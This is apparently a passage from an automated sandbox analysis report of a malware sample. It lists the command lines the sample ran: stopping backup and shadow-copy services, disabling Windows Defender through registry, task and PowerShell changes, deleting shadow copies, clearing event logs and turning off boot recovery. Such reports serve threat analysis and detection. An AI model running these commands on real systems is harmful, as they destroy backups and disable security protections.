PID 4004 wrote to memory of 1480 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4004 wrote to memory of 1480 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2832 wrote to memory of 212 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2832 wrote to memory of 212 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 3500 wrote to memory of 668 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3500 wrote to memory of 668 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 692 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 692 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 340 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 340 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe

"C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_13373" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_13373" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_13373" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 52.109.8.19:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 40.119.148.38:123 time.windows.com udp

Files

memory/2776-118-0x0000000000000000-mapping.dmp

memory/3152-119-0x0000000000000000-mapping.dmp

memory/3688-120-0x0000000000000000-mapping.dmp

memory/1336-121-0x0000000000000000-mapping.dmp

memory/1208-122-0x0000000000000000-mapping.dmp

memory/932-123-0x0000000000000000-mapping.dmp

memory/2004-124-0x0000000000000000-mapping.dmp

memory/3164-125-0x0000000000000000-mapping.dmp

memory/652-126-0x0000000000000000-mapping.dmp

memory/3972-127-0x0000000000000000-mapping.dmp

memory/4012-128-0x0000000000000000-mapping.dmp

memory/3604-129-0x0000000000000000-mapping.dmp

memory/4004-130-0x0000000000000000-mapping.dmp

memory/1480-131-0x0000000000000000-mapping.dmp

memory/2832-132-0x0000000000000000-mapping.dmp

memory/212-133-0x0000000000000000-mapping.dmp

memory/3500-134-0x0000000000000000-mapping.dmp

memory/668-135-0x0000000000000000-mapping.dmp

memory/692-136-0x0000000000000000-mapping.dmp

memory/1436-137-0x0000000000000000-mapping.dmp

memory/896-138-0x0000000000000000-mapping.dmp

memory/2960-139-0x0000000000000000-mapping.dmp

memory/340-140-0x0000000000000000-mapping.dmp

memory/2012-141-0x0000000000000000-mapping.dmp

memory/2932-142-0x0000000000000000-mapping.dmp

memory/1488-143-0x0000000000000000-mapping.dmp

memory/2060-144-0x0000000000000000-mapping.dmp

memory/1800-145-0x0000000000000000-mapping.dmp

memory/3040-146-0x0000000000000000-mapping.dmp

memory/2132-147-0x0000000000000000-mapping.dmp

memory/3248-148-0x0000000000000000-mapping.dmp

memory/2920-149-0x0000000000000000-mapping.dmp

memory/3808-150-0x0000000000000000-mapping.dmp

memory/684-151-0x0000000000000000-mapping.dmp

memory/3644-152-0x0000000000000000-mapping.dmp

memory/3664-153-0x0000000000000000-mapping.dmp

memory/3076-154-0x0000000000000000-mapping.dmp

memory/1252-155-0x0000000000000000-mapping.dmp

memory/2144-156-0x0000000000000000-mapping.dmp

memory/3152-157-0x0000000000000000-mapping.dmp

memory/1212-158-0x0000000000000000-mapping.dmp

memory/640-159-0x0000000000000000-mapping.dmp

memory/368-160-0x0000000000000000-mapping.dmp

memory/420-161-0x0000000000000000-mapping.dmp

memory/3948-162-0x0000000000000000-mapping.dmp

memory/3744-163-0x0000000000000000-mapping.dmp

memory/3728-164-0x0000000000000000-mapping.dmp

memory/1420-165-0x0000000000000000-mapping.dmp

memory/216-166-0x0000000000000000-mapping.dmp

memory/596-167-0x0000000000000000-mapping.dmp

memory/2976-168-0x0000000000000000-mapping.dmp

memory/3036-169-0x0000000000000000-mapping.dmp

memory/1380-170-0x0000000000000000-mapping.dmp

memory/3504-171-0x0000000000000000-mapping.dmp

memory/2284-172-0x0000000000000000-mapping.dmp

memory/3044-173-0x0000000000000000-mapping.dmp

memory/1776-174-0x0000000000000000-mapping.dmp

memory/1032-175-0x0000000000000000-mapping.dmp

memory/2160-176-0x0000000000000000-mapping.dmp

memory/1748-177-0x0000000000000000-mapping.dmp

memory/3528-178-0x0000000000000000-mapping.dmp

memory/3676-179-0x0000000000000000-mapping.dmp

memory/3712-180-0x0000000000000000-mapping.dmp

memory/2256-181-0x0000000000000000-mapping.dmp

memory/1068-182-0x00000224814D0000-0x00000224814D2000-memory.dmp

memory/1068-183-0x00000224814D0000-0x00000224814D2000-memory.dmp

memory/1068-184-0x00000224814D0000-0x00000224814D2000-memory.dmp

memory/1068-185-0x00000224814D0000-0x00000224814D2000-memory.dmp

memory/1068-186-0x000002249B4C0000-0x000002249B4E2000-memory.dmp

memory/1068-187-0x00000224814D0000-0x00000224814D2000-memory.dmp

memory/1068-188-0x00000224814D0000-0x00000224814D2000-memory.dmp

memory/1068-189-0x000002249B9A0000-0x000002249BA16000-memory.dmp

memory/1068-190-0x00000224814D0000-0x00000224814D2000-memory.dmp

memory/1068-195-0x000002249B483000-0x000002249B485000-memory.dmp

memory/1068-194-0x000002249B480000-0x000002249B482000-memory.dmp

memory/1068-196-0x000002249B486000-0x000002249B488000-memory.dmp

memory/1068-217-0x00000224814D0000-0x00000224814D2000-memory.dmp

memory/3368-219-0x000001D98C5A0000-0x000001D98C5A2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

memory/3368-220-0x000001D98C5A0000-0x000001D98C5A2000-memory.dmp

memory/3368-221-0x000001D98C5A0000-0x000001D98C5A2000-memory.dmp

memory/3368-222-0x000001D98C5A0000-0x000001D98C5A2000-memory.dmp

memory/3368-223-0x000001D98C890000-0x000001D98C8B2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 659e84e92d8fe213d32e0a9ce468d81d
SHA1 06f40e72ef5c8bee8904d7bf6fd03fe892817fe9
SHA256 6d06ee5f7f9540d181b654fd43e0233b5befa323d43d75663379deeb6644b6f3
SHA512 b45f840331bf4c6bbcb0284a2e33735fb94f86675b53237bab789620e8ab7fa19664cdf9b245a1cd1a6860ad1f924e0c0824222e3047356a0dc00e02ef925a2c

memory/3368-225-0x000001D98C5A0000-0x000001D98C5A2000-memory.dmp

memory/3368-227-0x000001D98C5A0000-0x000001D98C5A2000-memory.dmp

memory/1068-226-0x000002249B488000-0x000002249B489000-memory.dmp

memory/3368-228-0x000001D98C8C0000-0x000001D98C8C2000-memory.dmp

memory/3368-229-0x000001D98C8C3000-0x000001D98C8C5000-memory.dmp

memory/3368-230-0x000001D9A5080000-0x000001D9A50F6000-memory.dmp

memory/3368-231-0x000001D98C5A0000-0x000001D98C5A2000-memory.dmp

memory/3368-255-0x000001D98C8C6000-0x000001D98C8C8000-memory.dmp

memory/3368-256-0x000001D98C8C8000-0x000001D98C8C9000-memory.dmp

memory/3368-257-0x000001D98C5A0000-0x000001D98C5A2000-memory.dmp